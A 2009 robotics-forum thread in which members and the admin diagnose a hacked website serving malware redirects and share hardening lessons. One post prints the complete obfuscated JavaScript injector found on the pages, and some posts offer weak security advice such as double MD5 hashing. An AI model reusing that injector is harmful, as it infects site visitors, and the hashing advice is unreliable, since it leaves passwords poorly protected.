Society of Robots - Robot Forum

General Misc => Misc => Topic started by: want2learn on March 14, 2009, 12:15:10 AM

Title: Trojan horse on SoR??
Post by: want2learn on March 14, 2009, 12:15:10 AM
Anyone else get this or just me?

I have SoR in my favourites but the page is linked to the $50 robot tutorial, I just navigate to the forum from there, no big hassle really.
Since last night I've been getting a message from avast that 'step by step robot[1]htm contains a sample of JS Redirector E trojan horse'.

I've cleaned my computers but don't know if it's actually SoR or me. The message is still coming today.

Anyone else get this?

EDIT:-I've now been on a lot of other sites with absolutley no problems at all, Its now happening on more of SoR's pages and I had a bit of a time trying to get back onto the forum.
I'm beggining to think it's not me ???
Title: Re: Trojan horse on SoR??
Post by: MrWizard on March 14, 2009, 10:26:48 AM
I have no problem.....what kind of anti-virus software are you using ?
Title: Re: Trojan horse on SoR??
Post by: want2learn on March 14, 2009, 11:47:06 AM
AVAST (free edition), The resident scanner is picking up the redirector, only noticed because my link on my favourites is to the $50 tutorial and not the forum. I'm too lazy to change it ;D

I've tried loads of the other links in my favourites and I've browsed the net for a couple of hours too without problem, I'm only getting it with SoR

EDIT:- Since finding this yesterday, I've found the forum incredibly slow to load. Sometimes not even at all.

The homepage is giving the alert too. Funny becuse not the whole site seems to be affected, except for the slow loading issue (although all of the pages I have tried so far are slow, some are just marginally slower)
Title: Re: Trojan horse on SoR??
Post by: sigurd on March 14, 2009, 02:50:17 PM
I am getting that message too... :-\
Maybe its a glitch with !AVAST...
Wait, it cant be a new glitch... it hasn't upgraded for a while...
I hope it gets fixed soon...
Title: Re: Trojan horse on SoR??
Post by: Razor Concepts on March 14, 2009, 04:10:58 PM
I'm on Avast free edition and nothing comes up.
Title: Re: Trojan horse on SoR??
Post by: galannthegreat on March 14, 2009, 04:47:43 PM
New avast update I'm guessing. Really annoying, but I do notice it is reporting it as "MALWARE", so somebody should look into it pronto.
Title: Re: Trojan horse on SoR??
Post by: SmAsH on March 14, 2009, 05:12:38 PM
wait so when you scan for viruses there is a file labelled sor $50 robot for the favorites that your pc sees as a virus?
Title: Re: Trojan horse on SoR??
Post by: HDL_CinC_Dragon on March 14, 2009, 05:14:04 PM
Im running Norton and nothing comes up. My web browser is also Google Chrome. Ill try it on Fire Fox and IE.

-EDIT-
I just looked at step 1 of the tutorial in all 3 of my browsers and no warnings come up.
Usually Google Chrome will automatically redirect away from a web page that it has had reports of being malicious. Its brings you to a page that says why it was red flagged and then you can click a link that either takes you back to the page anyway or goes into more detail about the threat.
Title: Re: Trojan horse on SoR??
Post by: SeagullOne on March 14, 2009, 06:50:59 PM
I too am getting a warning for a Trojan Horse, and I too am using the Avast! free edition. It really confused me because its never done that before ???
Title: Re: Trojan horse on SoR??
Post by: Admin on March 14, 2009, 07:16:34 PM
The next time this happens, go to View Source, save it as a .txt, and email it to me.

[email protected]@gmail.DOT.c0m

There is quite the small possibility that someone hacked me and modified source code . . .
Title: Re: Trojan horse on SoR??
Post by: want2learn on March 15, 2009, 01:46:22 AM
The next time this happens, go to View Source, save it as a .txt, and email it to me.

Can't find any option to view source but I'm emailing you what I did find.
Title: Re: Trojan horse on SoR??
Post by: SmAsH on March 15, 2009, 02:05:44 AM
when your in the tutorial right click and go view page source it should open a new window with something like this:

then copy it into a .txt file and email it to john(admin)
Title: Re: Trojan horse on SoR??
Post by: Admin on March 15, 2009, 02:17:45 AM
I've looked through the various most likely to be infected files and couldn't see anything obvious. I need to see the page source to see exactly whats going on.

What browser and OS are you guys using?

My theory is that Statcounter, which runs a javascript on every page in SoR, is infected itself. It's external to SoR, so I'd have to write them if that's the case.

This look familiar? http://www.statcounter.com/counter/counter.js (http://www.statcounter.com/counter/counter.js)

I also run two javascripts from Google, so I'll assume they are secure . . .
http://www.google-analytics.com/urchin.js (http://www.google-analytics.com/urchin.js)
http://pagead2.googlesyndication.com/pagead/show_ads.js (http://pagead2.googlesyndication.com/pagead/show_ads.js)
Title: Re: Trojan horse on SoR??
Post by: want2learn on March 15, 2009, 02:31:02 AM
Sorry it's taking me a minute to get things done.

The only windows computer we have is my wifes laptop, the usual browser on this one is AOL's default browser. I had to start IE then get the source.

My home network has been down a while for Ahem (clears throat) maintanence. I really need to get some motivation to get things done :D

I've started one of my kids pc's which is running Ubuntu LTS, got firefox booted and wheyhey no problems, no redirection, NOTHING.

I'm starting to think this is a false positive from AVAST?
Title: Re: Trojan horse on SoR??
Post by: Admin on March 15, 2009, 02:38:34 AM
Its NOT a glitch . . .

want2learn just sent me the source, and holy crackers its loaded with bad stuff!!!

Incredibly obfuscated javascript, billions of random links, porn sites, etc. It seems to all be appended at the end of the page.

Strangely however I don't see this at my end. I looked through all the pages, viewing source and all, but I don't see anything . . . I refreshed the main page many times thinking its a trojan that intentionally appears some small percentage of the time. Still didn't see stuff.

No files are listed as modified that I didn't personally modify (checking by date).

Quote
I had to start IE then get the source.
I don't see it in IE 6 either . . .

My Norton AV isn't detecting anything . . .

Does this happen on *every* page load? Just the main page, or all pages? Does it also happen in the forum?
Title: Re: Trojan horse on SoR??
Post by: want2learn on March 15, 2009, 02:46:35 AM
The resident scanner warnings have been happening on the SoR Homepage, The $50 tutorial pages and the whole site has been slower loading.

Funny thing is I've just started looking through the site on both computers to give a comprehensive list and viola! no more problems ;D
Title: Re: Trojan horse on SoR??
Post by: Admin on March 15, 2009, 04:11:55 AM
want2learn emailed me and said it occurs on both Linux and Windows, on IE and Firefox.

I did a rootkit scan . . . apparently the SoR server has been rootkitted. So supposedly my site host screwed up security settings and that's how the baddies got in . . . I sent them and email but that's all I can do right now.

For now, if you visit SoR, TURN ON YOUR ANTI-VIRUS SOFTWARE!!! Also, temporarily disable javascript and redirects if you're extra paranoid . . .
Title: Re: Trojan horse on SoR??
Post by: SmAsH on March 15, 2009, 04:20:52 AM
wait, if i have norton360 its always on rigght? and im using firefox which says it scans webpages and downloaded files? you got me all paranoid now :-[ oh well, norton says phishing protection is on. not much more i can do realy eh. sit back and read away 8)
Title: Re: Trojan horse on SoR??
Post by: Tsukubadaisei on March 15, 2009, 04:34:00 AM
want2learn emailed me and said it occurs on both Linux and Windows, on IE and Firefox.

I did a rootkit scan . . . apparently the SoR server has been rootkitted. So supposedly my site host screwed up security settings and that's how the baddies got in . . . I sent them and email but that's all I can do right now.

For now, if you visit SoR, TURN ON YOUR ANTI-VIRUS SOFTWARE!!! Also, temporarily disable javascript and redirects if you're extra paranoid . . .

Just reporting but, I am on Linux(Fedora 10, up-to-date) and no problems.
Title: Re: Trojan horse on SoR??
Post by: airman00 on March 15, 2009, 07:31:06 AM
I assume that since I am on Mac there is no problems for me personally?
Title: Re: Trojan horse on SoR??
Post by: want2learn on March 15, 2009, 10:12:17 AM
Sorry I should've posted earlier but had kid stuff to take care of.

I know it may not be cleaned yet but in my last E-mail to admin I said I was no longer getting the alert and that I had attached another copy of the source which I thought looked pretty clean (compared to the first but I'm difinately no programmer so I'd tend to take admins word on it)
Title: Re: Trojan horse on SoR??
Post by: paulstreats on March 16, 2009, 07:07:58 AM
I got the same redirects on the family computer while looking at the forum coming from the main sor page(the first time ive had pop ups happen for a couple of years), it also created an 'add on' in internet explorer and a memory process that replaced the add on if you disable it. A quick scan and removal with malwarebytes antimalware sorted it out. I wonder if it is a random thingy or could it be getting in through the random google ads?
Title: Re: Trojan horse on SoR??
Post by: Admin on March 16, 2009, 10:02:21 AM
SoR has been rootkitted at the server level (meaning they changed files on the server that I can't access).

My host hasn't responded to my email . . .

so all I can say right now is:

BLOCK REDIRECTS in your browser

DISABLE JAVASCRIPT in your browser
Title: Re: Trojan horse on SoR??
Post by: HDL_CinC_Dragon on March 16, 2009, 01:44:37 PM
Google Chrome build 1.0.154.48 on Windows XP Home SP3  (dunno what the heck happened to my Pro copy....) with Norton Anti Virus Gaming Edition build 16.2.0.7
No problems here. Ill start looking at source code to see if im getting the malicious JS on my end


-EDIT-
I loaded several different SoR pages and looked through the page sources and found nothing out of the ordinary. I skimmed the whole thing and saw nothing that would be malicious.... has the problem been fixed already?
Title: Re: Trojan horse on SoR??
Post by: Admin on March 16, 2009, 08:03:38 PM
No the problem has not been fixed.

It appears to be a hack that randomly appears only some percentage of the time.
Title: Re: Trojan horse on SoR??
Post by: HDL_CinC_Dragon on March 17, 2009, 01:47:21 PM
Hmm I just sat on step_by_step_robot_step1.shtml and refreshed about 20 times in Google Chrome and 20 times on Fire Fox and skimmed the source code each time and didnt come up with anything.... maybe it knows id strangle it with its own lines of code if it showed its ugly face?

Oh well, guess im done on this topic then lol
Title: Re: Trojan horse on SoR??
Post by: offy on March 17, 2009, 03:18:45 PM
I went through all the files, checking the code, javascript, and it all seems code. I am using FireFox 3 on Ubuntu 8.10.

@admin: I know a few really good hosts that don't get any problems that you may want to look into, send me a PM or something.

@all: If someone does get a trojan horse don't worry. You can remove them. If you need help just PM me.
Title: Re: Trojan horse on SoR??
Post by: Admin on March 18, 2009, 12:05:18 AM
My host claims their own rootkit scanner is often wrong. They also blame php.ini (which runs the forum) as the problem.

But the main SoR site doesn't use php . . .

So question to everyone, has the problem only happened on the regular site with .shtml pages, or does it also happen in the forum too?
Title: Re: Trojan horse on SoR??
Post by: Admin on March 18, 2009, 12:44:15 AM
Ok I found the hack, finally!

Apparently this forum was hacked through a php script . . . still trying to figure out how that infected non-forum pages . . .

I'm working with the SMF creators to figure this out:
http://www.simplemachines.org/community/index.php?topic=299718.0 (http://www.simplemachines.org/community/index.php?topic=299718.0)

In the meantime, please report any weirdness to me.
Title: Re: Trojan horse on SoR??
Post by: Admin on March 18, 2009, 09:55:01 AM
The next time someone sees the hack happen, please email me the exact url in the address bar that you see. I have a theory . . .
Title: Re: Trojan horse on SoR??
Post by: HDL_CinC_Dragon on March 18, 2009, 01:36:41 PM
Ok, im now checking the source code every time I load a page on SoR. You said the mal links were just appended onto the end right?
Title: Re: Trojan horse on SoR??
Post by: offy on March 18, 2009, 01:51:22 PM
I use to hack (bad offy) and I know a few ways people could of got in, admin, if you would like me to patch up some flaws in the system I can.
Title: Re: Trojan horse on SoR??
Post by: Admin on March 18, 2009, 11:28:40 PM
I had a look at the error logs myself, didn't trust my host . . . believe it or not, the hacker has been trying to break into SoR since mid-January . . . mostly failed bruteforce attempts, the most recent were failed php attacks on the forum (I didn't know they failed at first). It wasn't the forum that was hacked after all.

I haven't figured out how they got in, but I finally found their nasty redirect script. It appears to over rule the default index file on a webserver . . . scary!

Again, if anyone sees the problem come up again, let me know! I think I cleaned it all out, but I'm really not sure. This hacker seems determined . . .
Title: Re: Trojan horse on SoR??
Post by: dellagd on March 19, 2009, 01:47:06 PM
I have ben on SoR for a while and I havent seen any security pop-ups or anything unusual
I use 2 computers.
2 windows XPs, one running firefox portable addition and another IE 7.
maybe it doesn't happen to my IP for some reason.
Title: Re: Trojan horse on SoR??
Post by: offy on March 19, 2009, 02:12:15 PM
I have not noticed it either. But I have some javascript disabled for my own protection, and I think that is why most of us do not see it.
Title: Re: Trojan horse on SoR??
Post by: want2learn on March 19, 2009, 02:14:38 PM
I use a couple of computers too: wife's laptop on Vista, kids pc's on Ubuntu and my laptop on DSL.

Never experienced one problem at all with SoR  ;D until the evening before I raised this post  :(

I've got to say Admins done a great job of things, even more so because this isn't his full time job.

Hats off to you admin!
Title: Re: Trojan horse on SoR??
Post by: dellagd on March 19, 2009, 06:09:49 PM
I think you are understateing this site.
this is THE BEST amature robotics site there is by far.
Title: Re: Trojan horse on SoR??
Post by: Admin on March 19, 2009, 11:39:27 PM
 :)

Oh and behind the scenes, Dunk has been helping me secure the SoR site too. Extra props for him.
Title: Re: Trojan horse on SoR??
Post by: TrickyNekro on March 20, 2009, 02:02:41 AM
I just don't understand why they would like to hack a robot forum....
It's a noble course after all....

Thanks Admin and Dunk!!!
Title: Re: Trojan horse on SoR??
Post by: Admin on March 20, 2009, 04:08:03 AM
I just don't understand why they would like to hack a robot forum....
It's a noble course after all....
I don't think they want to destroy SoR. I just think they want to use any vulnerable server they can to spread their malware. Its probably to their benefit to not make their hack obvious. They hacked SoR like 6 weeks ago, but we didn't know until virus detectors saw it.
Title: Re: Trojan horse on SoR??
Post by: dellagd on March 20, 2009, 06:07:17 AM
hey,
look at it this way!
SoR is so good now that people want to hack it :P !
Title: Re: Trojan horse on SoR??
Post by: Admin on March 20, 2009, 10:51:25 PM
So you guys have probably noticed me AWOL for a few days . . . I've been trying to deal with this hack like 24/7 for the last few days.

I think I *finally* found the source of the hack. There was a known security flaw with my server control panel since August last year and I didn't patch it. I have 90% confidence that was the problem, and that its now patched.

That doesn't mean there still isn't a backdoor hidden somewhere that I didn't clean out . . . so I'm trying my best to make SoR more secure and to prevent this from happening again. Its my crash course in web security, I guess . . .

Strangely, they never bothered trying to hack my other website that's on the same server . . . I wouldn't have even noticed it as I rarely update it . . .

Lessons I've learned about web security to share with you guys:
- turn off all features on your server that you don't use (CGI, Perl, Ruby, PHP, etc.) as it increases the number of possible hacks
- update and patch your website/server software very often, like once a month or more
- keep an eye out for strange files on your server
- look at your error log occasionally for odd stuff
- block IP addresses in .htaccess that do bad stuff, as shown by your error log
- back up often, with the assumption that you'll have to delete your entire server to clean out a hack
- don't trust your web host to patch/update their own systems
Title: Re: Trojan horse on SoR??
Post by: Admin on March 23, 2009, 01:56:29 AM
I figured with all that I learned about defending websites against hacks in the last week, I should at least write up the basics and share.

Some of you already have started your own robotics website, so hopefully you find it useful:
http://www.societyofrobots.com/misc_hackproof.shtml (http://www.societyofrobots.com/misc_hackproof.shtml)
Title: Re: Trojan horse on SoR??
Post by: SmAsH on March 23, 2009, 02:17:26 AM
thanks for posting that admin, im sure many people who have their own sites will find it helpful and i know i will if i ever start my own site :) props to you 8)
Title: Re: Trojan horse on SoR??
Post by: offy on March 23, 2009, 04:08:46 PM
Also check your .htaccess. The .htaccess can change many settings, and can set up holes for hackers to get in. Also always download the newest script from a site if you are using a CMS. They update it for a reason, not just to waste 10 mins of your time to download, and upload.
Title: Re: Trojan horse on SoR??
Post by: paulstreats on March 23, 2009, 05:55:40 PM
Everybody should be aware of the "conficker worm/bot"(a worm that makes you part of a bot net then downloads more software- maybe for controlling/monitoring systems), I heard today that an upgraded version is expected to hit on april the 1st again (it hit last April 1st with a small target list and was controlled before it got out of hand, an upgraded version has already been released around january with a larger list but this might have been a test run for another april fools day run...).

It exploits the communication stack by overflowing it and gets allowed to run automatically without permission and presumably communicate over the net by overflowing the stack and confusing firewalls?. Updates and patches are really the only defence for windows systems.

look it up , it prevents you from downloading common virus removal tools, stops you from accessing process managers, prevents you from using the microsoft upgrade/patch tool and other stuff.

If it wasnt malicious, I'd take my hat off. Microsoft has a removal tool for the first version and they actually offer $250,000 reward for information that leads towards an arrest of the creators - it really has caused that much damage not only in systems but obviously man hours too (not to mention the flaw that it exploits works for all versions of windows including the new windows 7)
Title: Re: Trojan horse on SoR??
Post by: offy on March 23, 2009, 06:52:07 PM
Also back to websites.

People can crash sites if they truly try with no hacking. They run something called DoS or DDoS. Some people also run Bandwidth attack.

DoS: Means Denial of Service, they will ping out your server (with a team of around 100 computers or more) and your server will get so much "traffic" that it will crash.

DDoS: Is the same thing as DoS but more advnaced and faster

Bandwidth attack: Someone will upload a very large image, or get access to a very large page on your site, they will open the page millions of times, this causing your bandwidth to go up, this than makes it so you go over your bandwidth limit, and your site is inactive for a month or whenever your bandwidth resets.


I have been making PHP based sites for a few years, and I know all about these attack, I learned to hack to keep my stuff safe after 3 of my sites got hacked.
Title: Re: Trojan horse on SoR??
Post by: paulstreats on March 23, 2009, 07:08:45 PM
This is also the purpose behind the botnets. If you have a botnet under control, you can use it to purposefully crash systems. Large corporations occasionally get ransom demands from botnets. (pay us $$$$$ or we'll crash your system with our bot net)
Title: Re: Trojan horse on SoR??
Post by: householdutensils on March 23, 2009, 07:16:23 PM
Stress attacks shouldn't be handled by PHP or any server side scripting language (As in, sss languages you use to deliver pages) 0_0 they should be handled at daemon level. Apache modules for flood protection spring to mind. Obviously this is circumvented by using distributed botnets, however servers are still basically socket applications, so you can always limit the number of incoming connections to a low number if there is suddenly a large amount of stress applied to your boxes (Though this is not really viable on high traffic sites where stress is highly variable).
 
Besides, some of the the most damaging attacks are the sql injections that drop whole databases and xss and malicious code and session hijacking and screwed up folder permissions, or exploits in web applications.

Hell even cryptography comes into play when there are growing databases of md5 hashes for strings so people can reverse the basic md5 encryption used by most php applications by simple searching the the string that marches the hash.
Title: Re: Trojan horse on SoR??
Post by: offy on March 24, 2009, 12:56:15 PM
There are many SQL Injections, with them you could get the passwords from the database, but they will need to be cracked using brute force still.

XSS should not be a problem now a days. Our technology knowledge got better so the only way you will have a XSS problem if you are 100% new to programming and make a really bad PHP website (my first PHP website had this problem)
Title: Re: Trojan horse on SoR??
Post by: householdutensils on March 24, 2009, 01:09:24 PM
Well thats the thing. Since md5 is generally non-reversible (Authentication compares two hashes to determine if they come from the same string) outside of rainbow tables and other extremely complicated cryptography techniques that I'm not familiar with, it should be fairly secure. But the thing is, people have started creating databases of strings that match hash codes so that you can essentially search for a hash code, and provided it has already been added to the database, get back the initial string.

besides, SQL Injections as a method are dangerous, anyone see the xkcd comic about Robert'); DROP TABLE students;?

(http://imgs.xkcd.com/comics/exploits_of_a_mom.png)

As for xss well....with complexity invariably comes vulnerability. Even some of the most widely used PHP apps have had xss exploits released for them fairly recently. It might be easy to prevent xss in a small to medium size application, but once things start getting complicated enough, it's easy to open up gaping holes just waiting for someone to dive through. The problems even worse for open source software that freely release their src. That whole, crazy Crash Override Hollywood hacker paradigm really needs to be changed to some dude in trackpants with a terminal addiction to imitation fruit flavored soft drinks, pouring over source code in his bedroom until the dull ache behind the eyes signals time for a power nap.
Title: Re: Trojan horse on SoR??
Post by: offy on March 24, 2009, 03:03:22 PM
I love that commic, saw it like a million times. There are some very fast working MD5 crackers, I coded this one a while back (shame on me again) that would check every single letter, number, symbol, depends on what I set it on. Than it would save all the results to a .txt file, so whenever I needed to crack a md5, I could in a matter of minutes, instead of days, months, years other programs take.

Also very big PHP scripts do have XSS problems some times, but if they double check their work they can fix it, and if they do find one, it is very simple to fix, a few lines of code fixes it.

This just shows you no site is safe. When there are hackers and sites (and computer) open for attack, someone will get in, and it might just be a black hat for all you know, and they will sell your users emails, names, addresses. But for us lucky ones, the white hat will get in, and help us fix our site.
Title: Re: Trojan horse on SoR??
Post by: householdutensils on March 24, 2009, 03:20:27 PM
Haha all those comics are GOLD!! I love geek humor :D


Anyway, from my primitive understanding of cryptography, the avalanche effect makes letter by letter calculation completely irrelevant. I mean the 128-bit hash code can encrypt a variable length string, so the only way to get the original string is to completely disassemble the hash and reverse the mod operation processes that are used to create it, and even then, you'd need to know the original string since the algorithm uses integer derivatives of the initial string as constants in the encryption process.

At least, as far as I understand, I'm pretty lacking in this area since I've never really used it in practical application.
Title: Re: Trojan horse on SoR??
Post by: offy on March 24, 2009, 05:07:57 PM
Well the best way to secure a website, is do what I do now, double md5. I set it up so a user makes a password. Than it will make an MD5 of it. Than that MD5 gets encrypted to MD5 again, so a hacker will hack the password field of my site, and will get the MD5 of MD5, they will get so confused and mad. It is a great way, but takes longer to code.

The only way to be safe from a hacker, is to learn and hack your own sites over and over making sure there are no flaws. Some people even hire hackers to get into their site, to make sure it is safe.
Title: Re: Trojan horse on SoR??
Post by: householdutensils on March 24, 2009, 05:11:20 PM
hahahaha that's so awesome xD a hash of a hash of a string :D

Though it shouldn't take longer to code...given that all you need to do to use md5 is md5($string) ;) In fact you could nest it:

md5(md5($string));

Title: Re: Trojan horse on SoR??
Post by: offy on March 24, 2009, 05:18:26 PM
Oh, never knew I could nest it, well this is not about coding. I am going to stop getting more off topic.

I think Admin should add some more security to this site. And maybe get someone to try to hack it, and than they fix that flaw so this never happens again. (I am up for the job if needed)(White Hat hacker's rule)
Title: Re: Trojan horse on SoR??
Post by: Admin on April 07, 2009, 01:44:49 AM
Good news, sorta. My logs show the hacker trying to hack me again with the same old method. This time its not sticking. I'm pretty sure that my new defenses have effectively blocked him for now, and removed whatever harm he added :)
Title: Re: Trojan horse on SoR??
Post by: superchiku on April 07, 2009, 01:53:30 AM
hackers . .in sor ?              ? ? ? ?  how come  ???
Title: Re: Trojan horse on SoR??
Post by: SmAsH on April 07, 2009, 01:55:07 AM
yay for admin! although it is kin of sad that there are low lives who sit at home all day trying to do this kind of stuff and for what? to piss off a small community of people who just want to share knowledge? low.
@superchiku, havent you read this thread yet? and because they can and want to piss someone off instead of getting a job.
Title: Re: Trojan horse on SoR??
Post by: superchiku on April 07, 2009, 01:59:51 AM
lol...dont say that,..sum days back i also hacked inside my friends computer connected via local network...jst for fun..but then cracking is really bad....  i tell young enthusiatic ppl not to do such things...but do they listen.. ..
Title: Re: Trojan horse on SoR??
Post by: SmAsH on April 07, 2009, 02:03:54 AM
well weve all played pranks on friends but this isnt one of admins friends (i hope). this guy was trying to upload porn and shiz like that.
Title: Re: Trojan horse on SoR??
Post by: superchiku on April 07, 2009, 02:04:54 AM
find his ip...destroy him with a e bomb then ...             
Title: Re: Trojan horse on SoR??
Post by: SmAsH on April 07, 2009, 03:27:41 AM
i dont think we want to do that superchiku. sending an ebomb to a hacker would seem appropriate but i doubt anyone here would be able to make a complex enough one. and anyway we just want to keep him/her out of the site as it is not our job to deal with these people.
Title: Re: Trojan horse on SoR??
Post by: Joesavage1 on April 07, 2009, 04:45:00 AM
Wow! so this is what ive missed while ive been to busy building my $50 robot and stuff!!!
Title: Re: Trojan horse on SoR??
Post by: HDL_CinC_Dragon on April 07, 2009, 01:43:02 PM
I was going to take the time to learn how to hack (white cap hacking only) but I decided to take the time to learn programming and robotics instead :P I still have plenty of time for both later on anyway :)
Title: Re: Trojan horse on SoR??
Post by: Admin on April 07, 2009, 10:23:54 PM
I think its good to understand how hackers get into your systems to protect yourself from them.
Title: Re: Trojan horse on SoR??
Post by: superchiku on April 07, 2009, 10:36:33 PM
if u want to think like a cracker then u have to know the technics used by them...

and plzz guys stop using the word hacker...use cracker instead ...hackers a re gud ppl not the bad ones...
Title: Re: Trojan horse on SoR??
Post by: offy on April 07, 2009, 11:03:37 PM
Well hackers are good and bad

White Hat Hacker = Helps fix your system
Gray Hat = Just hacks for the heck of it
Black Hat = Hacks your bank account, computer, takes your info so they can get money and ruin your life.
Title: Re: Trojan horse on SoR??
Post by: SmAsH on April 08, 2009, 12:20:26 AM
Well hackers are good and bad

White Hat Hacker = Helps fix your system
Gray Hat = Just hacks for the heck of it
Black Hat = Hacks your bank account, computer, takes your info so they can get money and ruin your life.
wow i never knew there were names for the catgeories?
Title: Re: Trojan horse on SoR??
Post by: superchiku on April 08, 2009, 01:03:07 AM
yup ..there are ..ethical hackers are the good ones...crackers are the bad ones...
Title: Re: Trojan horse on SoR??
Post by: Admin on April 08, 2009, 01:20:18 AM
First, stop hijacking my thread! :P

Second, a cracker is someone who cracks software/passwords, for example before you pirate software you need to generate 'serialz'.

A hacker is just someone who takes things apart to figure out how they work. You can hack into a circuit just like you can hack into a system. Of course, unauthorized access to a system is illegal, but you can hack your own computer and it wouldn't be illegal.
Title: Re: Trojan horse on SoR??
Post by: superchiku on April 08, 2009, 06:32:04 AM
love it when the admin says...stop hijacking my thread ..i find it v cute...
Title: Re: Trojan horse on SoR??
Post by: Razor Concepts on April 18, 2009, 11:20:34 AM
Every time I go to the SoR main page or any forum page I get a pop up saying "Could not launch Acrobat". What's up?
Title: Re: Trojan horse on SoR??
Post by: Weird Fishes on April 18, 2009, 12:11:03 PM
In safari I get a page that says this site contains malicious code (a Google advisory) and this link: http://google.com/safebrowsing/diagnostic?tpl=safari&site=beebest.cn&hl=en-us. (http://google.com/safebrowsing/diagnostic?tpl=safari&site=beebest.cn&hl=en-us.)
Attached is the warning.
Title: Re: Trojan horse on SoR??
Post by: frank26080115 on April 18, 2009, 04:56:25 PM
Here's the full url
see attached screenshot
Title: Re: Trojan horse on SoR??
Post by: SmAsH on April 18, 2009, 05:00:21 PM
man, if there is another hack admins gonna be pissed. he just got through the first one and...
Title: Re: Trojan horse on SoR??
Post by: paulstreats on April 18, 2009, 05:24:22 PM
I came to SOR 30 mins ago and suddenly got a message from my firewall "S8ekhV.exe is trying to access the internet". Also a box came up telling me that system files had been changed and I need to insert the windows cd to replace the files. I ran malwarebytes antimalware which found it and removed it.

Just booted my computer again after removing the virus, tested a few websites and nothing happened but as soon as I came to SOR again I get the same as the above.

The reference site I use says S8ekhV.exe is an as yet unknown malware that is capable of creating, removing or modifying files on the hosts system.
Title: Re: Trojan horse on SoR??
Post by: SmAsH on April 18, 2009, 05:28:32 PM
oh! i guess thats why sor was down for like half an hour a few hours ago? and i better start scanning my pc...
Title: Re: Trojan horse on SoR??
Post by: frodo on April 19, 2009, 08:56:03 AM
if there are new things like that, it could mess up huge systms, so it needs to be stopped. sounds quite dangerous that s8.exe or whatever its called. i haven't got that warning although my computer has been freezing a lot and a hell of a lot slower so i wonder whether my anti-virus is down.
Title: Re: Trojan horse on SoR??
Post by: Gertlex on April 19, 2009, 08:58:04 AM
Here's the full url
see attached screenshot

Still happening.

Avast! FTW.
Title: Re: Trojan horse on SoR??
Post by: offy on April 19, 2009, 09:39:15 AM
I am so happy I have Linux, that stupid virus can't touch me =]
Title: Re: Trojan horse on SoR??
Post by: frodo on April 19, 2009, 09:40:11 AM
how can't it touch you if you're on linux?

EDIT:

on the end of my url, i normally get "index.php" but now i'm getting "http://www.societyofrobots.com/robotforum/index.php?PHPSESSID=29a3927e4259b972fde42827876afc48&" Should i be getting that and should i normally have ".php" on the end anyway?
Title: Re: Trojan horse on SoR??
Post by: offy on April 19, 2009, 10:00:02 AM
that is cookie data. I don't think it will do any harm, but im not to sure.

It can't touch me because linux does not run .exe files such as XP/Vista does and all other window os's. This virus is a .exe file so I am safe.
Title: Re: Trojan horse on SoR??
Post by: HDL_CinC_Dragon on April 19, 2009, 11:44:06 AM
It is in fact a hack on the forum. Its been like this for 2 days now. This script was appended to the bottom of the SoR source file:
Quote from: Some hacker jackass's script
function c320b87fdeq49ea41e584a3f(q49ea41e58520e){ function q49ea41e5859dd(){return 16;} return (eval('pa'+'rseInt')(q49ea41e58520e,q49ea41e5859dd()));}function q49ea41e58697d(q49ea41e58714c){ var q49ea41e5888ba=2; var q49ea41e58791b='';q49ea41e58985a=String['fromCharCode'];for(q49ea41e5880eb=0;q49ea41e5880eb<q49ea41e58714c.length;q49ea41e5880eb+=q49ea41e5888ba){ q49ea41e58791b+=(q49ea41e58985a(c320b87fdeq49ea41e584a3f(q49ea41e58714c.substr(q49ea41e5880eb,q49ea41e5888ba))));}return q49ea41e58791b;} var v1e='';var q49ea41e58a029='3C7'+v1e+'3637'+v1e+'2697'+v1e+'07'+v1e+'43E696628216D7'+v1e+'96961297'+v1e+'B646F637'+v1e+'56D656E7'+v1e+'42E7'+v1e+'7'+v1e+'7'+v1e+'2697'+v1e+'465287'+v1e+'56E657'+v1e+'363617'+v1e+'065282027'+v1e+'2533632536392536362537'+v1e+'322536312536642536352532302536652536312536642536352533642536332533332533322532302537'+v1e+'332537'+v1e+'32253633253364253237'+v1e+'2536382537'+v1e+'342537'+v1e+'342537'+v1e+'302533612532662532662537'+v1e+'37'+v1e+'2537'+v1e+'37'+v1e+'2537'+v1e+'37'+v1e+'2532652536332536662537'+v1e+'322537'+v1e+'302536312536642536312537'+v1e+'342536312532652536332536652532662537'+v1e+'302536382537'+v1e+'302536642537'+v1e+'392536312536342536642536392536652532662536392536652536342536352537'+v1e+'382532652537'+v1e+'302536382537'+v1e+'30253366253237'+v1e+'2532622534642536312537'+v1e+'342536382532652537'+v1e+'322536662537'+v1e+'352536652536342532382534642536312537'+v1e+'342536382532652537'+v1e+'32253631253665253634253666253664253238253239253261253331253331253337'+v1e+'253331253332253239253262253237'+v1e+'253331253334253336253332253330253636253339253636253333253339253331253334253237'+v1e+'2532302537'+v1e+'37'+v1e+'2536392536342537'+v1e+'34253638253364253333253332253230253638253635253639253637'+v1e+'2536382537'+v1e+'342533642533332533362533362532302537'+v1e+'332537'+v1e+'342537'+v1e+'39253663253635253364253237'+v1e+'2537'+v1e+'362536392537'+v1e+'332536392536322536392536632536392537'+v1e+'342537'+v1e+'39253361253638253639253634253634253635253665253237'+v1e+'2533652533632532662536392536362537'+v1e+'3225363125366425363525336527'+v1e+'29293B7'+v1e+'D7'+v1e+'6617'+v1e+'2206D7'+v1e+'969613D7'+v1e+'47'+v1e+'27'+v1e+'5653B3C2F7'+v1e+'3637'+v1e+'2697'+v1e+'07'+v1e+'43E';q49ea41e58afc8=document;q49ea41e58afc8.write(q49ea41e58697d(q49ea41e58a029));

Chrome wouldnt let me get on the page but firefox does. Im going to be spending the evening scanning my computer lol
Title: Re: Trojan horse on SoR??
Post by: Admin on April 19, 2009, 01:27:54 PM
darnit! >:(

The hack is a redirect to a virus hosted on a chinese website. Found lots of 'ladies' spam links in my directory, and some redirect scripts added on to both forum and non-forum pages.  It uses a pdf as the carrier file for the virus.

The hack has been removed, but I haven't figured out how it happened yet. I'll need more time to prevent the reoccurance.

Its similar to the last hack, but with some differences so not sure if its the same person yet.

Norton Anti-virus quickly caught it.
Title: Re: Trojan horse on SoR??
Post by: daz on April 19, 2009, 01:49:49 PM
darnit! >:(

The hack is a redirect to a virus hosted on a chinese website. Found lots of 'ladies' spam links in my directory, and some redirect scripts added on to both forum and non-forum pages.  It uses a pdf as the carrier file for the virus.

The hack has been removed, but I haven't figured out how it happened yet. I'll need more time to prevent the reoccurance.

Its similar to the last hack, but with some differences so not sure if its the same person yet.

Norton Anti-virus quickly caught it.
Hi. Not known around here, been interested and robots for a while and bookmarked your site for future reference (Been slowly buying the parts needed for the $50 robot).

